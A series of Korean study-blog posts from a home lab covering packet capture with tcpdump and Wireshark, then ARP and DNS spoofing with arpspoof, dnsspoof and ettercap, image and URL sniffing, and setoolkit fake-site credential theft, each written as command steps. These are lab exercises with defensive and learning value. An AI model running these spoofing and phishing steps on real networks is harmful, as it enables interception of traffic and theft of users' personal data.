안녕하세요~ 지방토끼입니다.

 

오늘은 네트워크 보안 TCPDUMP(패킷 캡쳐)에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Kali IP : 192.168.15.100

Linux IP : 192.168.15.101

Windows IP : 192.168.15.102

 

TCPDUMP(패킷 캡쳐)

# tcpdump

- 네트워크 인터페이스를 거치는 패킷을 캡처해주는 도구

 

(옵션)

-i : 인터페이스 지정

-w : 파일로 저장

-s : 패킷 크기

-c : 캡쳐 갯수 지정

-n : 서비스명을 숫자(IP/Port 번호)로 출력

-p : promiscuous 모드 해제

-v, -vv : 자세하게, 더 자세하게 출력

-x : 16진수 출력

-X : ASCII 출력

-q : 프로토콜 정보를 덜 출력

-r : 저장한 파일 읽기

src : 출발지 IP 지정

dst : 목적지 IP 지정

host : 특정 호스트를 오고가는 모든 패킷 필터링(출발지/목적지)

tcp port [포트번호] : tcp 포트 지정

 

1. eth0 인터페이스로 오고가는 모든 패킷 캡쳐(Kali)

# tcpdump -i eth0

 

 

 

2. 인터페이스 eth0, 패킷 크기 1500, tcp 포트 21 출력을 tcpdump.log 파알로 저장(Kali)

# tcpdump -i eth0 -w tcpdump.log -s 1500 tcp port 21

 

 

 

3. 파일 확인(Kali)

# tcpdump -Xnqr tcpdump.log

 

 

4. 파일 확인(Wireshark)

File -> Open

 

 

 

5. 인터페이스 eth0, tcp 포트 23 캡쳐(Kali)

# tcpdump -i eth0 tcp port 23

 

 

 

6. 인터페이스 eth0, 패킷 크기 1500, tcp 포트 23 캡쳐를 tcpdump2.log 파알로 저장(Kali)

# tcpdump -i eth0 -w tcpdump2.log -s 1500 tcp port 23

 

 

 

7. 파일 확인(Kali)

# tcpdump -Xnqr tcpdump2.log

 

 

 

8. 파일 확인(Wireshark)

File -> Open

 

 

 

9. eth0 인터페이스로 오고가는 패킷 10개만 캡쳐(Kali)

# tcpdump -i eth0 -c 10

 

 

 

10. eth0 인터페이스로 오고가는 패킷 10개만, 서비스명을 숫자(IP/Port 번호)로 캡쳐(Kali)

# tcpdump -i eth0 -c 10 -n

 

 

 

11. TCP 캡쳐

# tcpdump tcp

 

 

 

12. 포트번호 23 캡쳐

# tcpdump port 23

 

 

 

13. 출발지 IP주소가 192.168.15.100 캡쳐 (Kali)

# tcpdump -i eth0 src 192.168.15.100

 

 

 

14. 목적지 IP주소가 192.168.15.100 캡쳐 (Kali)

# tcpdump -i eth0 dst 192.168.15.100

 

 

 

15. 192.168.15.100 호스트를 오고가는 모든 패킷 캡쳐(Kali)

# tcpdump -i eth0 host 192.168.15.100

 

 

 

16. 출발지 IP주소가 192.168.15.100 이고 TCP 포트번호가 21 (Kali)

# tcpdump -i eth0 src 192.168.15.100 and tcp port 21

 

 

 

17. 네트워크 대역 전부 캡쳐(Kali)

# tcpdump -i eth0 net 192.168.15.0/24

 

 

 

18. 출발지 IP주소가 192.168.15.100 이고 TCP 포트번호가 21이거나 TCP 포트번호가 22 캡쳐

# tcpdump -i eth0 'src 192.168.15.100 and (tcp port 21 or tcp port 22)'

 

 

 

 

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 TCPDUMP(패킷 캡쳐)에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!

 

 

 

 

안녕하세요~ 지방토끼입니다.

오늘은 네트워크 보안 스니핑(Sniffing)-wireshark에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Kali IP : 192.168.15.100

Linux IP : 192.168.15.101

Windows IP : 192.168.15.102

 

스니핑(Sniffing)

- 사전적인 의미 : 코를 킁킁거리다, 냄새를 맡다.

- 해킹 기법으로서 의미 : 자신이 아닌 다른 상대방들이 패킷을 엿듣는 것, 훔쳐보는 것

(소극적(수동적) 공격(Passive Attack))

* 소극적(수동적) 공격(Passive Attack) <----------------------> 적극적(능동적) 공격(Active Attack)

 

1. 방화벽 해제(Linux)

# systemctl stop firewalld

# setenforce 0

 

 

2. 재시작(Linux)

# systemctl restart vsftpd

# systemctl restart telnet.socket

 

 

3. wireshark 실행(Linux)

# wireshark &

 

 

4. FTP 접속(Kali)

# ftp 192.168.15.101

 

 

5. wireshark 확인(Linux)

 

 

6. FTP 접속(Windows)

> ftp 192.168.15.101

 

 

7. wireshark 확인(Linux)

 

 

8. Telnet 접속(Kali, Windows)

# telnet 192.168.15.101

 

 

9. wireshark 확인(Linux)

 

 

 

10. SSH 접속(Kali)

# ssh -l root 192.168.15.101

 

 

11. wireshark 확인(Linux)

 

 

12. SSH 접속(Windows)

# ssh -l root 192.168.15.101

 

13. wireshark 확인(Linux)

 

 

 

 

Wireshark : 스니퍼

- 디스플레이 필터

- 스니핑을 하기 위한 도구

 

1. 재시작(Linux)

# systemctl restart httpd

# systemctl restart vsftpd

# systemctl restart telnet.socket

 

2. wireshark 실행(Linux)

# wireshark &

 

3. capture filter 기능(Linux)

-> 선택해서 캡쳐

 

 

4. Port Scan(Kali)

# nmap 192.168.15.101

 

5. IP 주소 필터

ip.addr : 출발지/목적지

ip.addr == 192.168.15.100

 

ip.src : 출발지

ip.src == 192.168.15.100

 

ip.dst : 목적지

ip.dst == 192.168.15.100

 

 

6. MAC 주소 필터

eth.addr : MAC Address

 

7. Port 필터

tcp.port : 출발지/목적지

tcp.port == 80

 

tcp.srcport : 출발지

tcp.srcport == 80

 

tcp.dstport : 목적지

tcp.dstport == 80

 

 

udp.port : 출발지/목적지

udp.port == 53

 

udp.srcport : 출발지

udp.srcport == 53

 

udp.dstport : 목적지

udp.dstport == 53

 

 

8. 조합

(1) IP 주소가 192.168.15.100 이면서 포트가 80번 인것 출력

ip.addr == 192.168.15.100 and tcp.port == 80

 

 

(2) 출발지 IP 주소가 192.168.15.100 이거나 출발지 포트가 80번 인것 출력

ip.src == 192.168.15.100 or tcp.srcport == 80

 

 

(3) 출발지 IP 주소가 192.168.15.100 아니거나 출발지 포트가 80번 인것 출력

ip.src != 192.168.15.100 or tcp.srcport == 80

 

 

(4) 출발지 IP 주소가 192.168.15.100 아니고 출발지 포트가 80번 아닌 것 출력

ip.src != 192.168.15.100 and tcp.srcport != 80

 

 

9. TCP Flags 필터

(1) SYN 플래그

tcp.flags.syn == 1

 

 

(2) SYN 이거나 ACK

tcp.flags.syn == 1 or tcp.flags.ack == 1

 

 

(3) RST 플래그

tcp.flags.reset == 1

 

 

10. 특정 문자열

data contains "\"hello\""

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 스니핑(Sniffing)-wireshark에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!

 

 

 

 

안녕하세요~ 지방토끼입니다.

오늘은 네트워크 보안 프러미스큐어스 모드(Promiscuous)에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Linux IP : 192.168.15.101

 

프러미스큐어스(Promiscuous) 모드

- 데이터 링크 계층과 네트워크 계층의 필터링을 해제하여 랜 카드가 스니핑이 가능한 상태

 

1. 네트워크 카드 확인(Linux)

# ifconfig

- ens33 : 인터페이스명

- flags : 인터페이스 상태

(UP/DOWN : 초기화/초기화X) (BROADCAST : 브로드캐스트 상태) (RUNNING : 전송상태) (MULTICAST : 멀티캐스트 상태)

- mtu : 최대 전송 단위 (현재 1500옥테트)

- inet : IP주소(IPv4 주소)

- netmask : IPv4 넷마스크

- broadcast : 브로드캐스트 주소

- inet6 : IPv6 주소

- prefixlen : IP주소에서 서브넷 마스크로 사용될 비트 수

- scopeid : IPv6범위

- ether : MAC 주소

- txqueuelen : 전송 큐 길이

- RX packets : 받은 패킷 정보

(packets, bytes, errors, dropped, overruns, frame)

- TX packets : 보낸 패킷 정보

(packets, bytes, errors, dropped, overruns, carrier, collisions)

 

 

2. 프러미스큐어스 모드 전환(Linux)

# ifconfig ens33 promisc

 

 

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 프러미스큐어스 모드(Promiscuous)에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!

 

 

 

 

안녕하세요~ 지방토끼입니다.

오늘은 네트워크 보안driftnet(Image 스니핑)에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Kali IP : 192.168.15.100

Linux IP : 192.168.15.101

Windows IP : 192.168.15.102

 

Image 스니핑(Sniffing)

# driftnet

- 이미지 데이터 수집

 

1. ARP Spoofing 공격 & IP Forwarding(Kali)

# arpspoof -i eth0 -t 192.168.15.102 192.168.15.2

# fragrouter -B1

 

 

2. Image 스니핑(Kali)

# driftnet -i eth0

 

 

3. 접속(Windows)

www.gmarket.com (접속해서 이미지 눌러보기)

 

 

4. 확인(Kali)

 

 

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 driftnet(Image 스니핑)에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!

 

 

 

 

안녕하세요~ 지방토끼입니다.

오늘은 네트워크 보안 urlsnarf(URL 스니핑)에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Kali IP : 192.168.15.100

Linux IP : 192.168.15.101

Windows IP : 192.168.15.102

 

URL 스니핑(Sniffing)

# urlsnarf

- HTTP 요청 데이터를 수집

 

1. ARP Spoofing 공격 & IP Forwarding(Kali)

# arpspoof -i eth0 -t 192.168.15.102 192.168.15.2

# fragrouter -B1

 

 

 

2. URL 스니핑(Kali)

# urlsnarf -i eth0

 

 

 

3. 접속(Windows)

www.naver.com (여러 사이트 들어가보기)

 

 

 

4. 확인(Kali)

 

 

 

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 urlsnarf(URL 스니핑)에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!

 

 

 

 

안녕하세요~ 지방토끼입니다.

오늘은 네트워크 보안 ettercap, setoolkit(가짜 사이트 유도, 개인정보 탈취)에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Kali IP : 192.168.15.100

Linux IP : 192.168.15.101

Windows IP : 192.168.15.102

 

가짜 사이트 유도, 개인정보 탈취

# setoolkit

 

1. 도메인 변조 파일 수정/추가(Kali)

/etc/ettercap/etter.dns

# cd /etc/ettercap

# vi etter.dns

 

 

 

2. 실행(Kali)

# ettercap –G (그래픽 모드)

 

 

 

3. 호스트 지정(Kali)

 

 

 

4. ARP Spoofing(Kali)

 

 

 

5. DNS Spoofing(Kali)

 

 

 

6. setoolkit 실행

# setoolkit

 

 

 

7. 확인(Windows)

 

 

 

 

8. 확인(Kali)

 

 

 

(참고)

안되면 firefox 라도 설치해서 해보기

 

 

 

 

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 ettercap, setoolkit(가짜 사이트 유도, 개인정보 탈취)에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!

 

 

 

안녕하세요~ 지방토끼입니다.

오늘은 네트워크 보안 arpspoof, dnsspoof, setoolkit(가짜 사이트 유도/개인정보 탈취)에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Kali IP : 192.168.15.100

Linux IP : 192.168.15.101

Windows IP : 192.168.15.102

 

가짜 사이트 유도/개인정보 탈취

# setoolkit

 

1. hosts 파일 생성(Kali)

# vi dns.hosts

 

 

 

2. ARP Spoofing 공격(Kali) // fragrouter OFF

# arpspoof -i eth0 -t 192.168.15.102 192.168.15.2

 

 

 

3. DNS Spoofing 공격(Kali)

# dnsspoof –i eth0 –f /root/dns.hosts

 

 

 

4. setoolkit 실행(Kali)

# setoolkit

 

 

 

5. 확인(Windows)

 

 

6. 확인(Kali)

 

 

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 arpspoof, dnsspoof, setoolkit(가짜 사이트 유도/개인정보 탈취)에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!

 

 

 

안녕하세요~ 지방토끼입니다.

오늘은 네트워크 보안 ettercap(ARP Spoofing, DNS Spoofing)에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Kali IP : 192.168.15.100

Linux IP : 192.168.15.101

Windows IP : 192.168.15.102

 

ettercap

- 텍스트 모드, 그래픽 모드

- ARP Spoofing, DNS Spoofing 동시 가능

 

1. 도메인 변조 파일 수정/추가(Kali)

/etc/ettercap/etter.dns

# cd /etc/ettercap

# vi etter.dns

 

 

 

2. 실행(Kali)

# ettercap –G (그래픽 모드)

 

 

 

3. 호스트 지정(Kali)

 

 

 

4. ARP Spoofing(Kali)

 

 

 

5. DNS Spoofing(Kali)

 

 

 

6. 확인(Windows)

 

 

 

7. 확인(Linux) (ettercap에서 host 선택은 Linux IP로 해야함)

 

 

 

(참고)

엣지 -> 설정 -> 검색 엔진 검색 // 이것도 실패할 경우 크롬, 엣지 외의 브라우저를 사용해 본다.

 

 

 

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 ettercap(ARP Spoofing, DNS Spoofing)에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!

 

 

 

 

+ Recent posts